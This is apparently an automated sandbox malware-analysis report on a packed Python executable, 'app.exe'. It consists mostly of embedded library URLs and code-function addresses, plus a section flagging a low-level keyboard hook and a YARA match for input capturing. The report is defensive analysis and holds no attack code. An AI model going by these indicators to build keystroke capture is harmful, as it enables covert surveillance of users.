    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.python.org/pypi/keyboard/):
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://python-jsonschema.readthedocs.io/
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://python-jsonschema.readthedocs.io/en/latest/api/jsonschema/protocols/#jsonschema.protocols.Va
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://python-jsonschema.readthedocs.io/en/latest/api/jsonschema/validators/#jsonschema.validators.
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://python-jsonschema.readthedocs.io/en/latest/errors/
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://python-jsonschema.readthedocs.io/en/latest/validate/#validating-formats
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://python-jsonschema.readthedocs.io/en/stable/
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
    Source: app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/dnspython/badge/?version=latest)
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/importlib-metadata/badge/?version=latest
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/python-jsonschema/badge/?version=stable&style=flat
    Source: app.exe, 00000002.00000002.3278572779.00000208332F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
    Source: app.exe, 00000002.00000002.3284318756.000002083A940000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://results.pre-commit.ci/badge/github/python-jsonschema/jsonschema/main.svg
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://results.pre-commit.ci/latest/github/python-jsonschema/jsonschema/main
    Source: app.exe, 00000002.00000002.3278071149.0000020832EC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scipy-cookbook.readthedocs.io/items/Ctypes.html
    Source: app.exe, 00000002.00000003.2087818270.0000020832EC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
    Source: app.exe, 00000002.00000003.2088649225.0000020832C7C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2088340207.0000020832C7C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2087818270.0000020832EC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
    Source: app.exe, 00000002.00000002.3278039696.0000020832E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
    Source: app.exe, 00000002.00000003.2087818270.0000020832EC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr&
    Source: app.exe, 00000002.00000003.2087818270.0000020832EC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr&r
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: https://stat.ethz.ch/~stahel/lognormal/bioscience.pdf
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/badges/package/pypi/importlib-metadata
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-met
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utm
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-jsonschema?utm_source=pypi-j
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-jsonschema?utm_source=pypi-jsonschema&utm_medium=referral
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
    Source: app.exe, 00000002.00000002.3283351198.000002083A0C2000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
    Source: app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
    Source: app.exe, 00000002.00000002.3283351198.000002083A002000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
    Source: app.exe, 00000002.00000002.3283179009.0000020839F50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
    Source: app.exe, 00000002.00000002.3282846768.0000020839DF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.archive.org/web/20080221202153/https://www.math.hmc.edu/~benjamin/papers/CombTrig.pdf
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288287065.00007FF8A8E60000.00000004.00000001.01000000.00000019.sdmpString found in binary or memory: https://web.archive.org/web/20090423014010/http://www.brighton-webs.co.uk:80/distributions/wald.asp
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: https://web.archive.org/web/20090514091424/http://brighton-webs.co.uk:80/distributions/rayleigh.asp
    Source: app.exe, 00000002.00000003.2088609981.0000020832FD8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
    Source: app.exe, 00000000.00000003.2074628570.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
    Source: app.exe, 00000000.00000003.2074698244.0000022254576000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2074628570.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2074628570.0000022254576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
    Source: app.exe, 00000002.00000002.3278244921.00000208330C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
    Source: app.exe, 00000002.00000002.3278071149.0000020833029000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2092269988.0000020833029000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/z(sid=079cbb01-8f44-4dc6-8fd0-3df76e4ee289)
    Source: cacert.pem.0.drString found in binary or memory: https://www.catcert.net/verarrel
    Source: app.exe, 00000000.00000003.2068105336.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3289485767.00007FF8B27CC000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: https://www.cs.hmc.edu/tr/hmc-cs-2014-0905.pdf
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 
00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dnspython.org
    Source: app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.itl.nist.gov/div898/handbook/eda/section3/eda3663.htm
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.itl.nist.gov/div898/handbook/eda/section3/eda3666.htm
    Source: app.exe, 00000000.00000003.2068528399.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.itl.nist.gov/div898/software/dataplot/refman2/auxillar/powpdf.pdf
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mathworks.com/help/techdoc/ref/rank.html
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openblas.net/
    Source: app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3287399981.00007FF8A8809000.00000002.00000001.01000000.00000010.sdmp, app.exe, 00000002.00000002.3288536168.00007FF8A8F38000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.openssl.org/H
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
    Source: app.exe, 00000002.00000002.3282611585.0000020839C50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0506/
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zenodo.org/badge/3072629.svg
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zenodo.org/badge/latestdoi/3072629

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    Source: Yara match, File source: Process Memory Space: app.exe PID: 4308, type: MEMORYSTR
    Source: C:\Users\user\Desktop\app.exe, Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\app.exe
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80339902_2_00007FF8A8033990
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80332702_2_00007FF8A8033270
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80753002_2_00007FF8A8075300
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A807A3502_2_00007FF8A807A350
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80703402_2_00007FF8A8070340
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8008B602_2_00007FF8A8008B60
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8028BA02_2_00007FF8A8028BA0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80683D02_2_00007FF8A80683D0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80763C02_2_00007FF8A80763C0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80053E02_2_00007FF8A80053E0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8017BF02_2_00007FF8A8017BF0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7FF3BF02_2_00007FF8A7FF3BF0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80044302_2_00007FF8A8004430
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7FF34402_2_00007FF8A7FF3440
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8032C702_2_00007FF8A8032C70
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A802A4802_2_00007FF8A802A480
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8024CB02_2_00007FF8A8024CB0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A800A4A02_2_00007FF8A800A4A0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80274A02_2_00007FF8A80274A0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7FFFCC02_2_00007FF8A7FFFCC0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80164C02_2_00007FF8A80164C0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A801ECC02_2_00007FF8A801ECC0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A806CD402_2_00007FF8A806CD40
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8009D902_2_00007FF8A8009D90
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8012DB02_2_00007FF8A8012DB0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8006DE02_2_00007FF8A8006DE0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8001DF02_2_00007FF8A8001DF0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A800AE102_2_00007FF8A800AE10
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A803C6002_2_00007FF8A803C600
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7FF8E502_2_00007FF8A7FF8E50
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A803D63C2_2_00007FF8A803D63C
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80246402_2_00007FF8A8024640
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A803EE7C2_2_00007FF8A803EE7C
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A800DED02_2_00007FF8A800DED0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80196C02_2_00007FF8A80196C0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80266E02_2_00007FF8A80266E0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8015F402_2_00007FF8A8015F40
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80757902_2_00007FF8A8075790
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A801F7C02_2_00007FF8A801F7C0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80748302_2_00007FF8A8074830
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80128202_2_00007FF8A8012820
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80378802_2_00007FF8A8037880
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80BC1402_2_00007FF8A80BC140
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80CB1602_2_00007FF8A80CB160
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80AFA302_2_00007FF8A80AFA30
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80B6A582_2_00007FF8A80B6A58
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80BD2B02_2_00007FF8A80BD2B0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80DAAFC2_2_00007FF8A80DAAFC
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80C4B302_2_00007FF8A80C4B30
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80AB3382_2_00007FF8A80AB338
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80B63C82_2_00007FF8A80B63C8
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80D344C2_2_00007FF8A80D344C
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80BE4702_2_00007FF8A80BE470
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80D54702_2_00007FF8A80D5470
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80D4CA02_2_00007FF8A80D4CA0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80BFCD02_2_00007FF8A80BFCD0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80C250C2_2_00007FF8A80C250C
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80D75402_2_00007FF8A80D7540
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80C05602_2_00007FF8A80C0560
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80DC6102_2_00007FF8A80DC610
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80D9E182_2_00007FF8A80D9E18
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80D66502_2_00007FF8A80D6650
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80C0E3C2_2_00007FF8A80C0E3C
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80C66682_2_00007FF8A80C6668
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80B5E602_2_00007FF8A80B5E60
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80AC6B02_2_00007FF8A80AC6B0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80CA6C02_2_00007FF8A80CA6C0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80DFF062_2_00007FF8A80DFF06
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80B66FC2_2_00007FF8A80B66FC
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80C6EFC2_2_00007FF8A80C6EFC
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80CC7202_2_00007FF8A80CC720
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80DBF182_2_00007FF8A80DBF18
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80AD7B02_2_00007FF8A80AD7B0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80BAFD02_2_00007FF8A80BAFD0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80C57E02_2_00007FF8A80C57E0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80D183C2_2_00007FF8A80D183C
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80AE8D02_2_00007FF8A80AE8D0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81569002_2_00007FF8A8156900
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81391102_2_00007FF8A8139110
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81671502_2_00007FF8A8167150
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81859502_2_00007FF8A8185950
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A816C1B02_2_00007FF8A816C1B0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81399902_2_00007FF8A8139990
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A814B1902_2_00007FF8A814B190
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81789E02_2_00007FF8A81789E0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A813C25F2_2_00007FF8A813C25F
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8136A402_2_00007FF8A8136A40
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81622402_2_00007FF8A8162240
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81602502_2_00007FF8A8160250
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8169A502_2_00007FF8A8169A50
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A813A2902_2_00007FF8A813A290
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A815B2F02_2_00007FF8A815B2F0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8134AC02_2_00007FF8A8134AC0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A816CAC02_2_00007FF8A816CAC0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A814BB202_2_00007FF8A814BB20
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8159B302_2_00007FF8A8159B30
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81523002_2_00007FF8A8152300
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8172B102_2_00007FF8A8172B10
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A814CB802_2_00007FF8A814CB80
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81583802_2_00007FF8A8158380
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81573E02_2_00007FF8A81573E0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81533F02_2_00007FF8A81533F0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A815DBC02_2_00007FF8A815DBC0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8136C202_2_00007FF8A8136C20
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A816D4002_2_00007FF8A816D400
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8139C102_2_00007FF8A8139C10
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81754102_2_00007FF8A8175410
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81354602_2_00007FF8A8135460
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8183C602_2_00007FF8A8183C60
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A814FC402_2_00007FF8A814FC40
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81384502_2_00007FF8A8138450
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A816B4C02_2_00007FF8A816B4C0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8165CD02_2_00007FF8A8165CD0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A815ED302_2_00007FF8A815ED30
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81375102_2_00007FF8A8137510
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81825602_2_00007FF8A8182560
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8172D702_2_00007FF8A8172D70
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A816DD402_2_00007FF8A816DD40
    Source: C:\Users\user\Desktop\app.exe Code function: String function: 00007FF7ACE82770 appears 82 times
    Source: C:\Users\user\Desktop\app.exe Code function: String function: 00007FF8A7FF1010 appears 33 times
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.dr Static PE information: Number of sections : 19 > 10
    Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-util-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-console-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-process-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-synch-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
